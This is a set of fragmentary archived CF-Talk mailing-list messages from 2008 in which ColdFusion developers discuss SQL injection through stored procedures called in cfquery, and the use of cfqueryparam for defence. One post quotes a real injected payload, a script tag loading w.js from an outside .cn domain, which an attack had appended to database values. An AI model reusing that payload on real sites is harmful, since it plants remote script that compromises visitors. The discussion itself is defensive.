RE: cfquery and cfstoredproc

2008-07-23 Thread Dave Watts
Actually, I'm gonna pick on you again Dave and challenge this. (I'm hoping to add to my wall) If someone is using MySQL ... Well, the original poster was asking about the current attack, which specifically targets MS SQL Server. Dave Watts, CTO, Fig Leaf Software http://www.figleaf.com/

RE: cfquery and cfstoredproc

2008-07-23 Thread Dave Watts
Do you mind if I blog about that part where you said "Yeah, you're right about that"? That's got to be good for my cf_streetCred (ha). I don't mind, no. Dave Watts, CTO, Fig Leaf Software http://www.figleaf.com/ Fig Leaf Software provides the highest caliber vendor-authorized instruction

Re: cfquery and cfstoredproc

2008-07-23 Thread Brad Wood
Actually, I'm gonna pick on you again Dave and challenge this. (I'm hoping to add to my wall) If someone is using MySQL ... Well, the original poster was asking about the current attack, which specifically targets MS SQL Server. That might be true, but he didn't say that. He simply

RE: cfquery and cfstoredproc

2008-07-22 Thread Mark Kruger
Yes, you are vulnerable if you do not sanitize the inputs. Mark A. Kruger, CFG, MCSE (402) 408-3733 ext 105 www.cfwebtools.com www.coldfusionmuse.com www.necfug.com -Original Message- From: Tim Do [mailto:[EMAIL PROTECTED] Sent: Tuesday, July 22, 2008 2:28 PM To: CF-Talk Subject:

RE: cfquery and cfstoredproc

2008-07-22 Thread Gaulin, Mark
As you have heard, cfquery is vulnerable to sql injection attacks, so you have to do something. You will hear that cfqueryparam is the best practice for protecting against sql injection attacks, and there is certainly truth to that. However, there are also costs associated with cfqueryparam.

Re: cfquery and cfstoredproc

2008-07-22 Thread Brad Wood
(Depending on the version of CF, cfqueryparam disables cachedwithin caching. This is true, but it doesn't prevent you from baking your own caching mechanism as many have done. In all versions of CF, cfqueryparam effectively makes Sql Profiling with SQL Server useless and there is no

RE: cfquery and cfstoredproc

2008-07-22 Thread Mark Kruger
] Sent: Tuesday, July 22, 2008 3:46 PM To: CF-Talk Subject: Re: cfquery and cfstoredproc (Depending on the version of CF, cfqueryparam disables cachedwithin caching. This is true, but it doesn't prevent you from baking your own caching mechanism as many have done. In all versions of CF

RE: cfquery and cfstoredproc

2008-07-22 Thread Adrian Lynch
Subject: Re: cfquery and cfstoredproc In all versions of CF, cfqueryparam effectively makes Sql Profiling with SQL Server useless and there is no workaround. Please explain what you mean. Are you saying you can't run a trace and see your SQL running. That is certainly not true. It may complicate

RE: cfquery and cfstoredproc

2008-07-22 Thread Gaulin, Mark
ticks are insufficient, so now I know.) Thanks for the info. Mark -Original Message- From: Brad Wood [mailto:[EMAIL PROTECTED] Sent: Tuesday, July 22, 2008 4:46 PM To: CF-Talk Subject: Re: cfquery and cfstoredproc (Depending on the version of CF, cfqueryparam disables

Re: cfquery and cfstoredproc

2008-07-22 Thread Brad Wood
Thanks Adrian. That's cool. however, it is not useful DURING the execution of the SQL though correct? ~Brad - Original Message - From: Adrian Lynch [EMAIL PROTECTED] To: CF-Talk cf-talk@houseoffusion.com Sent: Tuesday, July 22, 2008 3:51 PM Subject: RE: cfquery and cfstoredproc

Re: cfquery and cfstoredproc

2008-07-22 Thread Brad Wood
- From: Gaulin, Mark [EMAIL PROTECTED] To: CF-Talk cf-talk@houseoffusion.com Sent: Tuesday, July 22, 2008 4:34 PM Subject: RE: cfquery and cfstoredproc Hi Brad Thanks for the links, those are interesting articles.

RE: cfquery and cfstoredproc

2008-07-22 Thread Dave Watts
I have been asked to look at a possible sql injection attack. As I look through the code I see stored procs being called by using cfquery like: cfquery name=asdf datasource=asdf storedproc '#var1#', '#var2#' cfquery I've read about using cfstored procs and params

RE: cfquery and cfstoredproc

2008-07-22 Thread Mark Kruger
[mailto:[EMAIL PROTECTED] Sent: Tuesday, July 22, 2008 5:50 PM To: CF-Talk Subject: RE: cfquery and cfstoredproc I have been asked to look at a possible sql injection attack. As I look through the code I see stored procs being called by using cfquery like: cfquery name=asdf datasource

RE: cfquery and cfstoredproc

2008-07-22 Thread Dave Watts
What about a semi-colon? Storedproc '#var1#','#var2#' ; *other code* Would the CFQUERY not allow this additional code to run? It wouldn't allow any of the values after the stored procedure call storedproc to run as code, because they would be placed in the input parameters of the stored

RE: cfquery and cfstoredproc

2008-07-22 Thread Tim Do
Subject: RE: cfquery and cfstoredproc Dave, What about a semi-colon? Storedproc '#var1#','#var2#' ; *other code* Would the CFQUERY not allow this additional code to run? -Mark Mark A. Kruger, CFG, MCSE (402) 408-3733 ext 105 www.cfwebtools.com www.coldfusionmuse.com www.necfug.com

RE: cfquery and cfstoredproc

2008-07-22 Thread Dave Watts
So I'm hearing that it should be fine?? Somehow their database columns values were appended the following string : /titleInvalidTag src=http://1.verynx.cn/w.js;/script!-- So for example the column firstname value was John became: John/titleInvalidTag

RE: cfquery and cfstoredproc

2008-07-22 Thread Mark Kruger
www.necfug.com -Original Message- From: Dave Watts [mailto:[EMAIL PROTECTED] Sent: Tuesday, July 22, 2008 6:07 PM To: CF-Talk Subject: RE: cfquery and cfstoredproc What about a semi-colon? Storedproc '#var1#','#var2#' ; *other code* Would the CFQUERY not allow this additional code to run

RE: cfquery and cfstoredproc

2008-07-22 Thread Dave Watts
I never disagree with you (usually a fool's errand) Ha! I wish. but I want a clarification. I think you might mean that this particular use is safe because CF will escape the single quotes. But the code below is vulnerable in exactly the same way as a CFQUERY. As a test I created an SP

RE: cfquery and cfstoredproc

2008-07-22 Thread Dave Watts
So I'm hearing that it should be fine?? Somehow their database columns values were appended the following string : /titleInvalidTag src=http://1.verynx.cn/w.js;/script!-- So for example the column firstname value was John became: John/titleInvalidTag

RE: cfquery and cfstoredproc

2008-07-22 Thread Mark Kruger
Dave, Do you mind if I blog about that part where you said "Yeah, you're right about that"? That's got to be good for my cf_streetCred (ha). -mk -Original Message- From: Dave Watts [mailto:[EMAIL PROTECTED] Sent: Tuesday, July 22, 2008 7:14 PM To: CF-Talk Subject: RE: cfquery

Re: cfquery and cfstoredproc

2008-07-22 Thread Brad Wood
, 2008 8:58 PM Subject: RE: cfquery and cfstoredproc Dave, Do you mind if I blog about that part where you said "Yeah, you're right about that"? That's got to be good for my cf_streetCred (ha). -mk

Re: cfquery and cfstoredproc

2008-07-22 Thread Brad Wood
As Mark pointed out, if you did have numeric inputs in your CFQUERY tag, those would still be vulnerable. If not, though, the rest of my statement still stands. Dave Watts, CTO, Fig Leaf Software http://www.figleaf.com/ Actually, I'm gonna pick on you again Dave and challenge this. (I'm